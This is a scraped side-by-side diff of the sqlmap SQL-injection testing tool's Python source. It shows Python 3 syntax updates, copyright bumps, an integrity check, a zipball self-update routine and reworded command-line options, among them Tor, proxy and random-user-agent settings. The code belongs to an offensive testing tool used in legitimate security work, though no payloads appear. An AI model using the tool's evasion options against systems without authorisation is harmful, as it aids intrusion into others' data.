f.write(kb.originalUrls.get(conf.url) or conf.url or conf.hostname)
|
||||||
f.write(" (%s)" % (HTTPMETHOD.POST if conf.data else HTTPMETHOD.GET))
|
f.write(" (%s)" % (HTTPMETHOD.POST if conf.data else HTTPMETHOD.GET))
|
||||||
f.write(" # %s" % getUnicode(subprocess.list2cmdline(sys.argv), encoding=sys.stdin.encoding))
|
f.write(" # %s" % getUnicode(subprocess.list2cmdline(sys.argv), encoding=sys.stdin.encoding))
|
||||||
if conf.data:
|
if conf.data:
|
||||||
f.write("\n\n%s" % getUnicode(conf.data))
|
f.write("\n\n%s" % getUnicode(conf.data))
|
||||||
except IOError, ex:
|
except IOError as ex:
|
||||||
if "denied" in getUnicode(ex):
|
if "denied" in getUnicode(ex):
|
||||||
errMsg = "you don't have enough permissions "
|
errMsg = "you don't have enough permissions "
|
||||||
else:
|
else:
|
||||||
@@ -688,6 +704,13 @@ def _createTargetDirs():
|
|||||||
_createFilesDir()
|
_createFilesDir()
|
||||||
_configureDumper()
|
_configureDumper()
|
||||||
|
|
||||||
|
def _setAuxOptions():
|
||||||
|
"""
|
||||||
|
Setup auxiliary (host-dependent) options
|
||||||
|
"""
|
||||||
|
|
||||||
|
kb.aliasName = randomStr(seed=hash(conf.hostname or ""))
|
||||||
|
|
||||||
def _restoreMergedOptions():
|
def _restoreMergedOptions():
|
||||||
"""
|
"""
|
||||||
Restore merged options (command line, configuration file and default values)
|
Restore merged options (command line, configuration file and default values)
|
||||||
@@ -734,6 +757,9 @@ def initTargetEnv():
|
|||||||
setattr(conf.data, UNENCODED_ORIGINAL_VALUE, original)
|
setattr(conf.data, UNENCODED_ORIGINAL_VALUE, original)
|
||||||
kb.postSpaceToPlus = '+' in original
|
kb.postSpaceToPlus = '+' in original
|
||||||
|
|
||||||
|
match = re.search(INJECT_HERE_REGEX, conf.data or "") or re.search(INJECT_HERE_REGEX, conf.url or "")
|
||||||
|
kb.customInjectionMark = match.group(0) if match else CUSTOM_INJECTION_MARK_CHAR
|
||||||
|
|
||||||
def setupTargetEnv():
|
def setupTargetEnv():
|
||||||
_createTargetDirs()
|
_createTargetDirs()
|
||||||
_setRequestParams()
|
_setRequestParams()
|
||||||
@@ -741,3 +767,4 @@ def setupTargetEnv():
|
|||||||
_resumeHashDBValues()
|
_resumeHashDBValues()
|
||||||
_setResultsFile()
|
_setResultsFile()
|
||||||
_setAuthCred()
|
_setAuthCred()
|
||||||
|
_setAuxOptions()
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
@@ -17,6 +17,7 @@ import traceback
|
|||||||
|
|
||||||
from extra.beep.beep import beep
|
from extra.beep.beep import beep
|
||||||
from lib.controller.controller import start
|
from lib.controller.controller import start
|
||||||
|
from lib.core.common import checkIntegrity
|
||||||
from lib.core.common import clearConsoleLine
|
from lib.core.common import clearConsoleLine
|
||||||
from lib.core.common import dataToStdout
|
from lib.core.common import dataToStdout
|
||||||
from lib.core.common import getUnicode
|
from lib.core.common import getUnicode
|
||||||
@@ -51,6 +52,9 @@ def smokeTest():
|
|||||||
retVal = True
|
retVal = True
|
||||||
count, length = 0, 0
|
count, length = 0, 0
|
||||||
|
|
||||||
|
if not checkIntegrity():
|
||||||
|
retVal = False
|
||||||
|
|
||||||
for root, _, files in os.walk(paths.SQLMAP_ROOT_PATH):
|
for root, _, files in os.walk(paths.SQLMAP_ROOT_PATH):
|
||||||
if any(_ in root for _ in ("thirdparty", "extra")):
|
if any(_ in root for _ in ("thirdparty", "extra")):
|
||||||
continue
|
continue
|
||||||
@@ -71,10 +75,10 @@ def smokeTest():
|
|||||||
try:
|
try:
|
||||||
__import__(path)
|
__import__(path)
|
||||||
module = sys.modules[path]
|
module = sys.modules[path]
|
||||||
except Exception, msg:
|
except Exception as ex:
|
||||||
retVal = False
|
retVal = False
|
||||||
dataToStdout("\r")
|
dataToStdout("\r")
|
||||||
errMsg = "smoke test failed at importing module '%s' (%s):\n%s" % (path, os.path.join(root, filename), msg)
|
errMsg = "smoke test failed at importing module '%s' (%s):\n%s" % (path, os.path.join(root, filename), ex)
|
||||||
logger.error(errMsg)
|
logger.error(errMsg)
|
||||||
else:
|
else:
|
||||||
# Run doc tests
|
# Run doc tests
|
||||||
@@ -271,10 +275,10 @@ def runCase(parse):
|
|||||||
result = start()
|
result = start()
|
||||||
except KeyboardInterrupt:
|
except KeyboardInterrupt:
|
||||||
pass
|
pass
|
||||||
except SqlmapBaseException, e:
|
except SqlmapBaseException as ex:
|
||||||
handled_exception = e
|
handled_exception = ex
|
||||||
except Exception, e:
|
except Exception as ex:
|
||||||
unhandled_exception = e
|
unhandled_exception = ex
|
||||||
finally:
|
finally:
|
||||||
sys.stdout.seek(0)
|
sys.stdout.seek(0)
|
||||||
console = sys.stdout.read()
|
console = sys.stdout.read()
|
||||||
|
|||||||
@@ -1,10 +1,12 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
from __future__ import print_function
|
||||||
|
|
||||||
import difflib
|
import difflib
|
||||||
import random
|
import random
|
||||||
import threading
|
import threading
|
||||||
@@ -91,10 +93,13 @@ def exceptionHandledFunction(threadFunction, silent=False):
|
|||||||
kb.threadContinue = False
|
kb.threadContinue = False
|
||||||
kb.threadException = True
|
kb.threadException = True
|
||||||
raise
|
raise
|
||||||
except Exception, ex:
|
except Exception as ex:
|
||||||
if not silent:
|
if not silent and kb.get("threadContinue"):
|
||||||
logger.error("thread %s: %s" % (threading.currentThread().getName(), ex.message))
|
logger.error("thread %s: %s" % (threading.currentThread().getName(), ex.message))
|
||||||
|
|
||||||
|
if conf.get("verbose") > 1:
|
||||||
|
traceback.print_exc()
|
||||||
|
|
||||||
def setDaemon(thread):
|
def setDaemon(thread):
|
||||||
# Reference: http://stackoverflow.com/questions/190010/daemon-threads-explanation
|
# Reference: http://stackoverflow.com/questions/190010/daemon-threads-explanation
|
||||||
if PYVERSION >= "2.6":
|
if PYVERSION >= "2.6":
|
||||||
@@ -105,7 +110,6 @@ def setDaemon(thread):
|
|||||||
def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardException=True, threadChoice=False, startThreadMsg=True):
|
def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardException=True, threadChoice=False, startThreadMsg=True):
|
||||||
threads = []
|
threads = []
|
||||||
|
|
||||||
kb.multiThreadMode = True
|
|
||||||
kb.threadContinue = True
|
kb.threadContinue = True
|
||||||
kb.threadException = False
|
kb.threadException = False
|
||||||
|
|
||||||
@@ -147,7 +151,7 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio
|
|||||||
|
|
||||||
try:
|
try:
|
||||||
thread.start()
|
thread.start()
|
||||||
except Exception, ex:
|
except Exception as ex:
|
||||||
errMsg = "error occurred while starting new thread ('%s')" % ex.message
|
errMsg = "error occurred while starting new thread ('%s')" % ex.message
|
||||||
logger.critical(errMsg)
|
logger.critical(errMsg)
|
||||||
break
|
break
|
||||||
@@ -163,8 +167,9 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio
|
|||||||
alive = True
|
alive = True
|
||||||
time.sleep(0.1)
|
time.sleep(0.1)
|
||||||
|
|
||||||
except (KeyboardInterrupt, SqlmapUserQuitException), ex:
|
except (KeyboardInterrupt, SqlmapUserQuitException) as ex:
|
||||||
print
|
print()
|
||||||
|
kb.prependFlag = False
|
||||||
kb.threadContinue = False
|
kb.threadContinue = False
|
||||||
kb.threadException = True
|
kb.threadException = True
|
||||||
|
|
||||||
@@ -180,22 +185,24 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio
|
|||||||
if forwardException:
|
if forwardException:
|
||||||
raise
|
raise
|
||||||
|
|
||||||
except (SqlmapConnectionException, SqlmapValueException), ex:
|
except (SqlmapConnectionException, SqlmapValueException) as ex:
|
||||||
print
|
print()
|
||||||
kb.threadException = True
|
kb.threadException = True
|
||||||
logger.error("thread %s: %s" % (threading.currentThread().getName(), ex.message))
|
logger.error("thread %s: %s" % (threading.currentThread().getName(), ex.message))
|
||||||
|
|
||||||
|
if conf.get("verbose") > 1:
|
||||||
|
traceback.print_exc()
|
||||||
|
|
||||||
except:
|
except:
|
||||||
from lib.core.common import unhandledExceptionMessage
|
from lib.core.common import unhandledExceptionMessage
|
||||||
|
|
||||||
print
|
print()
|
||||||
kb.threadException = True
|
kb.threadException = True
|
||||||
errMsg = unhandledExceptionMessage()
|
errMsg = unhandledExceptionMessage()
|
||||||
logger.error("thread %s: %s" % (threading.currentThread().getName(), errMsg))
|
logger.error("thread %s: %s" % (threading.currentThread().getName(), errMsg))
|
||||||
traceback.print_exc()
|
traceback.print_exc()
|
||||||
|
|
||||||
finally:
|
finally:
|
||||||
kb.multiThreadMode = False
|
|
||||||
kb.bruteMode = False
|
kb.bruteMode = False
|
||||||
kb.threadContinue = True
|
kb.threadContinue = True
|
||||||
kb.threadException = False
|
kb.threadException = False
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|||||||
@@ -1,25 +1,34 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import locale
|
import glob
|
||||||
import os
|
import os
|
||||||
import re
|
import re
|
||||||
|
import shutil
|
||||||
import subprocess
|
import subprocess
|
||||||
|
import sys
|
||||||
import time
|
import time
|
||||||
|
import urllib
|
||||||
|
import zipfile
|
||||||
|
|
||||||
from lib.core.common import dataToStdout
|
from lib.core.common import dataToStdout
|
||||||
from lib.core.common import getSafeExString
|
from lib.core.common import getSafeExString
|
||||||
|
from lib.core.common import getLatestRevision
|
||||||
from lib.core.common import pollProcess
|
from lib.core.common import pollProcess
|
||||||
|
from lib.core.common import readInput
|
||||||
from lib.core.data import conf
|
from lib.core.data import conf
|
||||||
from lib.core.data import logger
|
from lib.core.data import logger
|
||||||
from lib.core.data import paths
|
from lib.core.data import paths
|
||||||
from lib.core.revision import getRevisionNumber
|
from lib.core.revision import getRevisionNumber
|
||||||
from lib.core.settings import GIT_REPOSITORY
|
from lib.core.settings import GIT_REPOSITORY
|
||||||
from lib.core.settings import IS_WIN
|
from lib.core.settings import IS_WIN
|
||||||
|
from lib.core.settings import VERSION
|
||||||
|
from lib.core.settings import ZIPBALL_PAGE
|
||||||
|
from lib.core.settings import UNICODE_ENCODING
|
||||||
|
|
||||||
def update():
|
def update():
|
||||||
if not conf.updateAll:
|
if not conf.updateAll:
|
||||||
@@ -28,25 +37,80 @@ def update():
|
|||||||
success = False
|
success = False
|
||||||
|
|
||||||
if not os.path.exists(os.path.join(paths.SQLMAP_ROOT_PATH, ".git")):
|
if not os.path.exists(os.path.join(paths.SQLMAP_ROOT_PATH, ".git")):
|
||||||
errMsg = "not a git repository. Please checkout the 'sqlmapproject/sqlmap' repository "
|
warnMsg = "not a git repository. It is recommended to clone the 'sqlmapproject/sqlmap' repository "
|
||||||
errMsg += "from GitHub (e.g. 'git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap')"
|
warnMsg += "from GitHub (e.g. 'git clone --depth 1 %s sqlmap')" % GIT_REPOSITORY
|
||||||
logger.error(errMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
|
if VERSION == getLatestRevision():
|
||||||
|
logger.info("already at the latest revision '%s'" % getRevisionNumber())
|
||||||
|
return
|
||||||
|
|
||||||
|
message = "do you want to try to fetch the latest 'zipball' from repository and extract it (experimental) ? [y/N]"
|
||||||
|
if readInput(message, default='N', boolean=True):
|
||||||
|
directory = os.path.abspath(paths.SQLMAP_ROOT_PATH)
|
||||||
|
|
||||||
|
try:
|
||||||
|
open(os.path.join(directory, "sqlmap.py"), "w+b")
|
||||||
|
except Exception as ex:
|
||||||
|
errMsg = "unable to update content of directory '%s' ('%s')" % (directory, getSafeExString(ex))
|
||||||
|
logger.error(errMsg)
|
||||||
|
else:
|
||||||
|
attrs = os.stat(os.path.join(directory, "sqlmap.py")).st_mode
|
||||||
|
for wildcard in ('*', ".*"):
|
||||||
|
for _ in glob.glob(os.path.join(directory, wildcard)):
|
||||||
|
try:
|
||||||
|
if os.path.isdir(_):
|
||||||
|
shutil.rmtree(_)
|
||||||
|
else:
|
||||||
|
os.remove(_)
|
||||||
|
except:
|
||||||
|
pass
|
||||||
|
|
||||||
|
if glob.glob(os.path.join(directory, '*')):
|
||||||
|
errMsg = "unable to clear the content of directory '%s'" % directory
|
||||||
|
logger.error(errMsg)
|
||||||
|
else:
|
||||||
|
try:
|
||||||
|
archive = urllib.urlretrieve(ZIPBALL_PAGE)[0]
|
||||||
|
|
||||||
|
with zipfile.ZipFile(archive) as f:
|
||||||
|
for info in f.infolist():
|
||||||
|
info.filename = re.sub(r"\Asqlmap[^/]+", "", info.filename)
|
||||||
|
if info.filename:
|
||||||
|
f.extract(info, directory)
|
||||||
|
|
||||||
|
filepath = os.path.join(paths.SQLMAP_ROOT_PATH, "lib", "core", "settings.py")
|
||||||
|
if os.path.isfile(filepath):
|
||||||
|
with open(filepath, "rb") as f:
|
||||||
|
version = re.search(r"(?m)^VERSION\s*=\s*['\"]([^'\"]+)", f.read()).group(1)
|
||||||
|
logger.info("updated to the latest version '%s#dev'" % version)
|
||||||
|
success = True
|
||||||
|
except Exception as ex:
|
||||||
|
logger.error("update could not be completed ('%s')" % getSafeExString(ex))
|
||||||
|
else:
|
||||||
|
if not success:
|
||||||
|
logger.error("update could not be completed")
|
||||||
|
else:
|
||||||
|
try:
|
||||||
|
os.chmod(os.path.join(directory, "sqlmap.py"), attrs)
|
||||||
|
except OSError:
|
||||||
|
logger.warning("could not set the file attributes of '%s'" % os.path.join(directory, "sqlmap.py"))
|
||||||
else:
|
else:
|
||||||
infoMsg = "updating sqlmap to the latest development version from the "
|
infoMsg = "updating sqlmap to the latest development revision from the "
|
||||||
infoMsg += "GitHub repository"
|
infoMsg += "GitHub repository"
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
debugMsg = "sqlmap will try to update itself using 'git' command"
|
debugMsg = "sqlmap will try to update itself using 'git' command"
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
|
|
||||||
dataToStdout("\r[%s] [INFO] update in progress " % time.strftime("%X"))
|
dataToStdout("\r[%s] [INFO] update in progress" % time.strftime("%X"))
|
||||||
|
|
||||||
try:
|
try:
|
||||||
process = subprocess.Popen("git checkout . && git pull %s HEAD" % GIT_REPOSITORY, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=paths.SQLMAP_ROOT_PATH.encode(locale.getpreferredencoding())) # Reference: http://blog.stastnarodina.com/honza-en/spot/python-unicodeencodeerror/
|
process = subprocess.Popen("git checkout . && git pull %s HEAD" % GIT_REPOSITORY, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=paths.SQLMAP_ROOT_PATH.encode(sys.getfilesystemencoding() or UNICODE_ENCODING))
|
||||||
pollProcess(process, True)
|
pollProcess(process, True)
|
||||||
stdout, stderr = process.communicate()
|
stdout, stderr = process.communicate()
|
||||||
success = not process.returncode
|
success = not process.returncode
|
||||||
except (IOError, OSError), ex:
|
except (IOError, OSError) as ex:
|
||||||
success = False
|
success = False
|
||||||
stderr = getSafeExString(ex)
|
stderr = getSafeExString(ex)
|
||||||
|
|
||||||
@@ -55,7 +119,7 @@ def update():
|
|||||||
else:
|
else:
|
||||||
if "Not a git repository" in stderr:
|
if "Not a git repository" in stderr:
|
||||||
errMsg = "not a valid git repository. Please checkout the 'sqlmapproject/sqlmap' repository "
|
errMsg = "not a valid git repository. Please checkout the 'sqlmapproject/sqlmap' repository "
|
||||||
errMsg += "from GitHub (e.g. 'git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap')"
|
errMsg += "from GitHub (e.g. 'git clone --depth 1 %s sqlmap')" % GIT_REPOSITORY
|
||||||
logger.error(errMsg)
|
logger.error(errMsg)
|
||||||
else:
|
else:
|
||||||
logger.error("update could not be completed ('%s')" % re.sub(r"\W+", " ", stderr).strip())
|
logger.error("update could not be completed ('%s')" % re.sub(r"\W+", " ", stderr).strip())
|
||||||
@@ -68,7 +132,7 @@ def update():
|
|||||||
infoMsg += "download the latest snapshot from "
|
infoMsg += "download the latest snapshot from "
|
||||||
infoMsg += "https://github.com/sqlmapproject/sqlmap/downloads"
|
infoMsg += "https://github.com/sqlmapproject/sqlmap/downloads"
|
||||||
else:
|
else:
|
||||||
infoMsg = "for Linux platform it's required "
|
infoMsg = "for Linux platform it's recommended "
|
||||||
infoMsg += "to install a standard 'git' package (e.g.: 'sudo apt-get install git')"
|
infoMsg += "to install a standard 'git' package (e.g.: 'sudo apt-get install git')"
|
||||||
|
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
@@ -43,11 +43,11 @@ class Wordlist(object):
|
|||||||
if os.path.splitext(self.current)[1].lower() == ".zip":
|
if os.path.splitext(self.current)[1].lower() == ".zip":
|
||||||
try:
|
try:
|
||||||
_ = zipfile.ZipFile(self.current, 'r')
|
_ = zipfile.ZipFile(self.current, 'r')
|
||||||
except zipfile.error, ex:
|
except zipfile.error as ex:
|
||||||
errMsg = "something appears to be wrong with "
|
errMsg = "something appears to be wrong with "
|
||||||
errMsg += "the file '%s' ('%s'). Please make " % (self.current, getSafeExString(ex))
|
errMsg += "the file '%s' ('%s'). Please make " % (self.current, getSafeExString(ex))
|
||||||
errMsg += "sure that you haven't made any changes to it"
|
errMsg += "sure that you haven't made any changes to it"
|
||||||
raise SqlmapInstallationException, errMsg
|
raise SqlmapInstallationException(errMsg)
|
||||||
if len(_.namelist()) == 0:
|
if len(_.namelist()) == 0:
|
||||||
errMsg = "no file(s) inside '%s'" % self.current
|
errMsg = "no file(s) inside '%s'" % self.current
|
||||||
raise SqlmapDataException(errMsg)
|
raise SqlmapDataException(errMsg)
|
||||||
@@ -68,15 +68,15 @@ class Wordlist(object):
|
|||||||
while True:
|
while True:
|
||||||
self.counter += 1
|
self.counter += 1
|
||||||
try:
|
try:
|
||||||
retVal = self.iter.next().rstrip()
|
retVal = next(self.iter).rstrip()
|
||||||
except zipfile.error, ex:
|
except zipfile.error as ex:
|
||||||
errMsg = "something appears to be wrong with "
|
errMsg = "something appears to be wrong with "
|
||||||
errMsg += "the file '%s' ('%s'). Please make " % (self.current, getSafeExString(ex))
|
errMsg += "the file '%s' ('%s'). Please make " % (self.current, getSafeExString(ex))
|
||||||
errMsg += "sure that you haven't made any changes to it"
|
errMsg += "sure that you haven't made any changes to it"
|
||||||
raise SqlmapInstallationException, errMsg
|
raise SqlmapInstallationException(errMsg)
|
||||||
except StopIteration:
|
except StopIteration:
|
||||||
self.adjust()
|
self.adjust()
|
||||||
retVal = self.iter.next().rstrip()
|
retVal = next(self.iter).rstrip()
|
||||||
if not self.proc_count or self.counter % self.proc_count == self.proc_id:
|
if not self.proc_count or self.counter % self.proc_count == self.proc_id:
|
||||||
break
|
break
|
||||||
return retVal
|
return retVal
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|||||||
@@ -1,10 +1,12 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
from __future__ import print_function
|
||||||
|
|
||||||
import os
|
import os
|
||||||
import re
|
import re
|
||||||
import shlex
|
import shlex
|
||||||
@@ -50,9 +52,7 @@ def cmdLineParser(argv=None):
|
|||||||
# Reference: https://stackoverflow.com/a/4012683 (Note: previously used "...sys.getfilesystemencoding() or UNICODE_ENCODING")
|
# Reference: https://stackoverflow.com/a/4012683 (Note: previously used "...sys.getfilesystemencoding() or UNICODE_ENCODING")
|
||||||
_ = getUnicode(os.path.basename(argv[0]), encoding=sys.stdin.encoding)
|
_ = getUnicode(os.path.basename(argv[0]), encoding=sys.stdin.encoding)
|
||||||
|
|
||||||
usage = "%s%s [options]" % ("python " if not IS_WIN else "", \
|
usage = "%s%s [options]" % ("python " if not IS_WIN else "", "\"%s\"" % _ if " " in _ else _)
|
||||||
"\"%s\"" % _ if " " in _ else _)
|
|
||||||
|
|
||||||
parser = OptionParser(usage=usage)
|
parser = OptionParser(usage=usage)
|
||||||
|
|
||||||
try:
|
try:
|
||||||
@@ -101,29 +101,27 @@ def cmdLineParser(argv=None):
|
|||||||
help="Force usage of given HTTP method (e.g. PUT)")
|
help="Force usage of given HTTP method (e.g. PUT)")
|
||||||
|
|
||||||
request.add_option("--data", dest="data",
|
request.add_option("--data", dest="data",
|
||||||
help="Data string to be sent through POST")
|
help="Data string to be sent through POST (e.g. \"id=1\")")
|
||||||
|
|
||||||
request.add_option("--param-del", dest="paramDel",
|
request.add_option("--param-del", dest="paramDel",
|
||||||
help="Character used for splitting parameter values")
|
help="Character used for splitting parameter values (e.g. &)")
|
||||||
|
|
||||||
request.add_option("--cookie", dest="cookie",
|
request.add_option("--cookie", dest="cookie",
|
||||||
help="HTTP Cookie header value")
|
help="HTTP Cookie header value (e.g. \"PHPSESSID=a8d127e..\")")
|
||||||
|
|
||||||
request.add_option("--cookie-del", dest="cookieDel",
|
request.add_option("--cookie-del", dest="cookieDel",
|
||||||
help="Character used for splitting cookie values")
|
help="Character used for splitting cookie values (e.g. ;)")
|
||||||
|
|
||||||
request.add_option("--load-cookies", dest="loadCookies",
|
request.add_option("--load-cookies", dest="loadCookies",
|
||||||
help="File containing cookies in Netscape/wget format")
|
help="File containing cookies in Netscape/wget format")
|
||||||
|
|
||||||
request.add_option("--drop-set-cookie", dest="dropSetCookie",
|
request.add_option("--drop-set-cookie", dest="dropSetCookie", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Ignore Set-Cookie header from response")
|
help="Ignore Set-Cookie header from response")
|
||||||
|
|
||||||
request.add_option("--user-agent", dest="agent",
|
request.add_option("--user-agent", dest="agent",
|
||||||
help="HTTP User-Agent header value")
|
help="HTTP User-Agent header value")
|
||||||
|
|
||||||
request.add_option("--random-agent", dest="randomAgent",
|
request.add_option("--random-agent", dest="randomAgent", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Use randomly selected HTTP User-Agent header value")
|
help="Use randomly selected HTTP User-Agent header value")
|
||||||
|
|
||||||
request.add_option("--host", dest="host",
|
request.add_option("--host", dest="host",
|
||||||
@@ -139,62 +137,55 @@ def cmdLineParser(argv=None):
|
|||||||
help="Extra headers (e.g. \"Accept-Language: fr\\nETag: 123\")")
|
help="Extra headers (e.g. \"Accept-Language: fr\\nETag: 123\")")
|
||||||
|
|
||||||
request.add_option("--auth-type", dest="authType",
|
request.add_option("--auth-type", dest="authType",
|
||||||
help="HTTP authentication type "
|
help="HTTP authentication type (Basic, Digest, NTLM or PKI)")
|
||||||
"(Basic, Digest, NTLM or PKI)")
|
|
||||||
|
|
||||||
request.add_option("--auth-cred", dest="authCred",
|
request.add_option("--auth-cred", dest="authCred",
|
||||||
help="HTTP authentication credentials "
|
help="HTTP authentication credentials (name:password)")
|
||||||
"(name:password)")
|
|
||||||
|
|
||||||
request.add_option("--auth-file", dest="authFile",
|
request.add_option("--auth-file", dest="authFile",
|
||||||
help="HTTP authentication PEM cert/private key file")
|
help="HTTP authentication PEM cert/private key file")
|
||||||
|
|
||||||
request.add_option("--ignore-code", dest="ignoreCode", type="int",
|
request.add_option("--ignore-code", dest="ignoreCode", type="int",
|
||||||
help="Ignore HTTP error code (e.g. 401)")
|
help="Ignore (problematic) HTTP error code (e.g. 401)")
|
||||||
|
|
||||||
request.add_option("--ignore-proxy", dest="ignoreProxy", action="store_true",
|
request.add_option("--ignore-proxy", dest="ignoreProxy", action="store_true",
|
||||||
help="Ignore system default proxy settings")
|
help="Ignore system default proxy settings")
|
||||||
|
|
||||||
request.add_option("--ignore-redirects", dest="ignoreRedirects", action="store_true",
|
request.add_option("--ignore-redirects", dest="ignoreRedirects", action="store_true",
|
||||||
help="Ignore redirection attempts")
|
help="Ignore redirection attempts")
|
||||||
|
|
||||||
request.add_option("--ignore-timeouts", dest="ignoreTimeouts", action="store_true",
|
request.add_option("--ignore-timeouts", dest="ignoreTimeouts", action="store_true",
|
||||||
help="Ignore connection timeouts")
|
help="Ignore connection timeouts")
|
||||||
|
|
||||||
request.add_option("--proxy", dest="proxy",
|
request.add_option("--proxy", dest="proxy",
|
||||||
help="Use a proxy to connect to the target URL")
|
help="Use a proxy to connect to the target URL")
|
||||||
|
|
||||||
request.add_option("--proxy-cred", dest="proxyCred",
|
request.add_option("--proxy-cred", dest="proxyCred",
|
||||||
help="Proxy authentication credentials "
|
help="Proxy authentication credentials (name:password)")
|
||||||
"(name:password)")
|
|
||||||
|
|
||||||
request.add_option("--proxy-file", dest="proxyFile",
|
request.add_option("--proxy-file", dest="proxyFile",
|
||||||
help="Load proxy list from a file")
|
help="Load proxy list from a file")
|
||||||
|
|
||||||
request.add_option("--tor", dest="tor",
|
request.add_option("--tor", dest="tor", action="store_true",
|
||||||
action="store_true",
|
help="Use Tor anonymity network")
|
||||||
help="Use Tor anonymity network")
|
|
||||||
|
|
||||||
request.add_option("--tor-port", dest="torPort",
|
request.add_option("--tor-port", dest="torPort",
|
||||||
help="Set Tor proxy port other than default")
|
help="Set Tor proxy port other than default")
|
||||||
|
|
||||||
request.add_option("--tor-type", dest="torType",
|
request.add_option("--tor-type", dest="torType",
|
||||||
help="Set Tor proxy type (HTTP, SOCKS4 or SOCKS5 (default))")
|
help="Set Tor proxy type (HTTP, SOCKS4 or SOCKS5 (default))")
|
||||||
|
|
||||||
request.add_option("--check-tor", dest="checkTor",
|
request.add_option("--check-tor", dest="checkTor", action="store_true",
|
||||||
action="store_true",
|
help="Check to see if Tor is used properly")
|
||||||
help="Check to see if Tor is used properly")
|
|
||||||
|
|
||||||
request.add_option("--delay", dest="delay", type="float",
|
request.add_option("--delay", dest="delay", type="float",
|
||||||
help="Delay in seconds between each HTTP request")
|
help="Delay in seconds between each HTTP request")
|
||||||
|
|
||||||
request.add_option("--timeout", dest="timeout", type="float",
|
request.add_option("--timeout", dest="timeout", type="float",
|
||||||
help="Seconds to wait before timeout connection "
|
help="Seconds to wait before timeout connection (default %d)" % defaults.timeout)
|
||||||
"(default %d)" % defaults.timeout)
|
|
||||||
|
|
||||||
request.add_option("--retries", dest="retries", type="int",
|
request.add_option("--retries", dest="retries", type="int",
|
||||||
help="Retries when the connection timeouts "
|
help="Retries when the connection timeouts (default %d)" % defaults.retries)
|
||||||
"(default %d)" % defaults.retries)
|
|
||||||
|
|
||||||
request.add_option("--randomize", dest="rParam",
|
request.add_option("--randomize", dest="rParam",
|
||||||
help="Randomly change value for given parameter(s)")
|
help="Randomly change value for given parameter(s)")
|
||||||
@@ -211,54 +202,45 @@ def cmdLineParser(argv=None):
|
|||||||
request.add_option("--safe-freq", dest="safeFreq", type="int",
|
